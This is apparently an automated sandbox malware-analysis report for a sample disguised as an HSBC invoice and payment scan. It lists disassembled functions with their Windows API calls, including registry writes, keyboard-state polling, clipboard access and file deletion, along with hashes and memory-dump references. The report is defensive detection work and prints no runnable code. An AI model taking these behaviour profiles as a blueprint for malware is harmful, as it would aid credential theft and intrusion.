                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F0F910,00000000,?,00000000,?,?), ref: 00F00C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F00C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F00D1D
                    • RegCloseKey.ADVAPI32(?), ref: 00F0103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F0104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: f21121351ed11be05b3815e00924214f99e8b781f37e01a41f0ba0bdba47c3bf
                    • Instruction ID: 79474e1f3472d7ec7101a038b8b8c6f0edae2421f264be0a9a75d8ab44c81c9b
                    • Opcode Fuzzy Hash: f21121351ed11be05b3815e00924214f99e8b781f37e01a41f0ba0bdba47c3bf
                    • Instruction Fuzzy Hash: 970260756006119FCB14EF14C895E2AB7E5FF89724F04985DF98AAB3A2CB30ED41DB81
                    Function 00F0C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • DragQueryPoint.SHELL32(?,?), ref: 00F0C917
                      • Part of subcall function 00F0ADF1: ClientToScreen.USER32(?,?), ref: 00F0AE1A
                      • Part of subcall function 00F0ADF1: GetWindowRect.USER32(?,?), ref: 00F0AE90
                      • Part of subcall function 00F0ADF1: PtInRect.USER32(?,?,00F0C304), ref: 00F0AEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0C980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F0C98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F0C9AE
                    • _wcscat.LIBCMT ref: 00F0C9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F0C9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F0CA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F0CA47
                    • DragFinish.SHELL32(?), ref: 00F0CA4E
                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F0CB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 2166380349-3440237614
                    • Opcode ID: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                    • Instruction ID: 6f5e36d71243332dfc8b052e1392a87e0342844e8d7fa0d1c10120c2d51a5046
                    • Opcode Fuzzy Hash: 374a4a66c9cf33da5e6d34a05e56d593bd7588c79377f4566dd57d217153599a
                    • Instruction Fuzzy Hash: 1D616B71108305AFC711EF64CC85D9BBBE8FF89710F400A1EF599A21A1DB70DA49EB92
                    Function 00EEF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00EEF37E
                    • _wcscmp.LIBCMT ref: 00EEF393
                    • _wcscmp.LIBCMT ref: 00EEF3AA
                      • Part of subcall function 00EE45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EE45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF3D9
                    • FindClose.KERNEL32(00000000), ref: 00EEF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF400
                    • _wcscmp.LIBCMT ref: 00EEF427
                    • _wcscmp.LIBCMT ref: 00EEF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF450
                    • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF478
                    • FindClose.KERNEL32(00000000), ref: 00EEF485
                    • FindClose.KERNEL32(00000000), ref: 00EEF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                    • Instruction ID: 02b5f8e9c95f980c31f8b448663fcd1db4df6cba1ea19161d456bd80dd9cf34c
                    • Opcode Fuzzy Hash: a7f3e8003fdc38652d13602ad0ecf627009f941c4c2ad4470129daf110d353b5
                    • Instruction Fuzzy Hash: 8531B57250125D6ACB20AB75EC88ADF77ACAF49364F141175F850F30E1E730DA49DA54
                    Function 00F0C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F0C4EC
                    • GetFocus.USER32 ref: 00F0C4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 00F0C507
                    • _memset.LIBCMT ref: 00F0C632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F0C65D
                    • GetMenuItemCount.USER32(?), ref: 00F0C67D
                    • GetMenuItemID.USER32(?,00000000), ref: 00F0C690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F0C6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F0C70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F0C744
                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F0C779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                    • String ID: 0
                    • API String ID: 3616455698-4108050209
                    • Opcode ID: 34bf7a0479c12ca81116887057281e0a0569f711aba504540320bbcaeceb0935
                    • Instruction ID: db70fa38e133de0bb1f2ba39c188ee14472b49c1244fe835872005b805ac4c44
                    • Opcode Fuzzy Hash: 34bf7a0479c12ca81116887057281e0a0569f711aba504540320bbcaeceb0935
                    • Instruction Fuzzy Hash: 42818C756083059FD720DF14C884A6BBBE8FB89324F04062DF99997291D771E905FBA2
                    Function 00ED81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                      • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                      • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                      • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                      • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                      • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                      • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED825B
                    • _memset.LIBCMT ref: 00ED8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED828F
                    • GetLengthSid.ADVAPI32(?), ref: 00ED82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00ED82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED82F9
                    • GetLengthSid.ADVAPI32(?), ref: 00ED8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8325
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00ED832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED834D
                    • CopySid.ADVAPI32(00000000), ref: 00ED8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                    • Instruction ID: 9414c21bcd9fa2c9b6b5b96aa5e4b06dc1a48678a22cbeddd2bbb7c57143f78a
                    • Opcode Fuzzy Hash: 0d03c5bc64e9a3d20771a8bda9039763ca42da80b7b790658fbfd8fe2567565f
                    • Instruction Fuzzy Hash: 4B616971900209EFDF10DFA4DE84AEEBBB9FF04704F04912AF815A7291DB319A16DB60
                    Function 00E96843 Relevance: 19.6, Strings: 15, Instructions: 874COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                    • API String ID: 0-3700951917
                    • Opcode ID: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
                    • Instruction ID: 1db81ab4cd0d43b9d0997f85861f5d7bd71801817620ae5a6c55e9ba25a90b6d
                    • Opcode Fuzzy Hash: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
                    • Instruction Fuzzy Hash: 54727E71E002199BDF24DF58C8907EEB7B5EF48314F1491ABE859BB390E7709982DB90
                    Function 00F00665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00737
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F007D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F0086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F00AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F00ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: b576300f3276dd7e52093d3a1f9691b9564c4935ab3dcbee9611e4db5a262159
                    • Instruction ID: 91dd678b5ce5a73f3ff8a480b5c5aa67c0ca799995472d8f1a92c2b00cead838
                    • Opcode Fuzzy Hash: b576300f3276dd7e52093d3a1f9691b9564c4935ab3dcbee9611e4db5a262159
                    • Instruction Fuzzy Hash: AAE13C31604214AFCB14DF28C895E6ABBE4FF89714F04856DF88ADB2A2DB34E905DB51
                    Function 00EE0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00EE0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 00EE02C2
                    • GetKeyState.USER32(000000A0), ref: 00EE02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 00EE02F7
                    • GetKeyState.USER32(000000A1), ref: 00EE030C
                    • GetAsyncKeyState.USER32(00000011), ref: 00EE0324
                    • GetKeyState.USER32(00000011), ref: 00EE0336
                    • GetAsyncKeyState.USER32(00000012), ref: 00EE034E
                    • GetKeyState.USER32(00000012), ref: 00EE0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 00EE0378
                    • GetKeyState.USER32(0000005B), ref: 00EE038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                    • Instruction ID: cd5002eac4439d976467b8f996c4e8fb5c1577e3aeee3fc84e842701b64e6e13
                    • Opcode Fuzzy Hash: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                    • Instruction Fuzzy Hash: D741EB246047CE6EFF318AA598083B5BFE07F16358F08509DD6C6665C3EBE459C887A2
                    Function 00EF4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                    • Instruction ID: b35b9333c9ec4a3a6078fc45112f91079567eed8118c29c02fd47c05a4ab3bb6
                    • Opcode Fuzzy Hash: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                    • Instruction Fuzzy Hash: 5621D3757002189FDB20AF60EC49B7A77A8FF44310F14806AF94AEB2A1CB71AD01DB84
                    Function 00EE3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                      • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EE3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EE3B87
                    • MoveFileW.KERNEL32(?,?), ref: 00EE3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EE3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EE3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 9b588bb7257a1dcd374a977193a7e3c71033ff7960695f3ae0c681eebf898bc2
                    • Instruction ID: ae11ba7af1d8566074a8fceec67a6d1218091ceb27348e84b3055bf209127c01
                    • Opcode Fuzzy Hash: 9b588bb7257a1dcd374a977193a7e3c71033ff7960695f3ae0c681eebf898bc2
                    • Instruction Fuzzy Hash: 1951803180118D9ACF15FBA1CD968EDB7F9AF14304F6461A9E44A77091EF31AF09CB60
                    Function 00E94140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-3486589167
                    • Opcode ID: f86505e0da4881dc52371483709485aa592b1cedd91bc6e175df11c5e8793cc3
                    • Instruction ID: 3308973111c27fdcd1f664ef7c8b95fac6bd0280303e2f4d3fdc9f6625b59e15
                    • Opcode Fuzzy Hash: f86505e0da4881dc52371483709485aa592b1cedd91bc6e175df11c5e8793cc3
                    • Instruction Fuzzy Hash: 82A260B1E0421ACBDF24CF58CA90BEDB7B1BB54318F1491AAD856B7280D7719E82DF50
                    Function 00EEF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EEF6AB
                    • Sleep.KERNEL32(0000000A), ref: 00EEF6DB
                    • _wcscmp.LIBCMT ref: 00EEF6EF
                    • _wcscmp.LIBCMT ref: 00EEF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 00EEF7A8
                    • FindClose.KERNEL32(00000000), ref: 00EEF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 3236be4eaedf2df28df0fa13d9bdab6b17ea822f5d0dadb5317762e8e06fe479
                    • Instruction ID: 7aa4757ab95f9abd754a1586b545cb53b3faf5efd3b72e14059bd29cede156cc
